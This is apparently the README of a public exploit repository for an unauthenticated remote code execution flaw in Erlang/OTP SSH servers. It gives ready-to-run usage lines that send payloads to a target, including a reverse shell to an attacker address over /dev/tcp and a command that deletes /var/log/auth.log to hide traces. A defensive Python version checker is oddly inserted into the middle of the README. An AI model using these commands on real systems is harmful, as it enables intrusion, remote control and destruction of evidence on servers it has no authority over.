
Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, an SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling


Yuri08loveElaina/CVE_2025_32433_exploit



  • 🧠 Usage suggestions:

  • File-creation test:

python3 elaina_cve_2025_32433.py 192.168.1.10 22 'touch /tmp/pwned_by_elaina'

  • Reverse shell:

python3 elaina_cve_2025_32433.py 192.168.1.10 22 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'

  • 🔏 Note:

The script does not require an SSH key or password.

Works on affected Erlang/OTP SSH server versions (< 27.3.3, < 26.2.5.11, < 25.3.2.20).

Sends correctly formatted SSH binary messages according to RFC 4253.
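For defenders, the affected-version note above can be turned into an inventory check. The following is an added example, not part of this repository's script: it classifies Erlang/OTP version strings against the three fixed releases named on this page. The function names and the sample inventory are hypothetical, and versions on branches newer than 27 are reported as unknown because the page gives no threshold for them.

```python
import re

# Fixed releases per maintained branch, as listed in the note above.
FIXED = {27: (27, 3, 3), 26: (26, 2, 5, 11), 25: (25, 3, 2, 20)}

def parse_otp_version(text):
    """Turn 'OTP-26.2.5.10' or '27.3.3' into a tuple of ints for comparison."""
    m = re.fullmatch(r"(?:OTP-)?(\d+(?:\.\d+)*)", text.strip())
    if not m:
        raise ValueError(f"unrecognised OTP version: {text!r}")
    return tuple(int(part) for part in m.group(1).split("."))

def patch_status(text):
    """Return 'affected', 'fixed' or 'unknown' for one OTP version string."""
    version = parse_otp_version(text)
    major = version[0]
    if major > max(FIXED):
        # The page gives no threshold for newer branches; do not guess.
        return "unknown"
    # Branches older than 25 sit below every fixed release listed above.
    fixed = FIXED.get(major, FIXED[min(FIXED)])
    # Tuple comparison is numeric per component, so 25.3.2.9 < 25.3.2.20
    # and 26.2.5 < 26.2.5.11 both hold (string comparison gets these wrong).
    return "affected" if version < fixed else "fixed"

def hosts_to_upgrade(inventory):
    """Map {host: version} to a sorted list of (host, version, target)."""
    todo = []
    for host, text in inventory.items():
        if patch_status(text) == "affected":
            major = parse_otp_version(text)[0]
            target = FIXED.get(major, FIXED[min(FIXED)])
            todo.append((host, text, "OTP-" + ".".join(map(str, target))))
    return sorted(todo)

# Constructed inventory for illustration; hostnames and versions are made up.
SAMPLE = {
    "mq-01": "OTP-27.3.2",
    "mq-02": "OTP-27.3.3",
    "db-01": "26.2.5",
    "db-02": "25.3.2.9",
    "old-01": "24.3.4.17",
    "lab-01": "28.0",
}

if __name__ == "__main__":
    for host, have, want in hosts_to_upgrade(SAMPLE):
        print(f"{host}: {have} is affected, upgrade to at least {want}")
```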

  • 🧱 Explanation:

  • touch: command in Unix/Linux used to create an empty file.

  • /tmp/pwned_by_elaina: path to the file to create in the /tmp directory, where most Linux systems allow writing.

  • 🧪 Purpose in the exploit:

  • When you run the payload:

python3 elaina_cve_2025_32433.py 192.168.1.10 22 'touch /tmp/pwned_by_elaina'

then:

  • ✅ If the exploit is successful, the file will appear on the victim's machine:

/tmp/pwned_by_elaina

  • 🚫 If this file does not appear, the payload may be blocked or the machine is not affected.

  • 🔎 Check the result:

  • If you have a shell on the victim machine, check:

ls -l /tmp/pwned_by_elaina

📌 Other options:

  • You can replace it with any command you want, for example:

  • Send a reverse shell:

bash -i >& /dev/tcp/10.10.14.6/4444 0>&1

  • Delete the log file:

rm -rf /var/log/auth.log
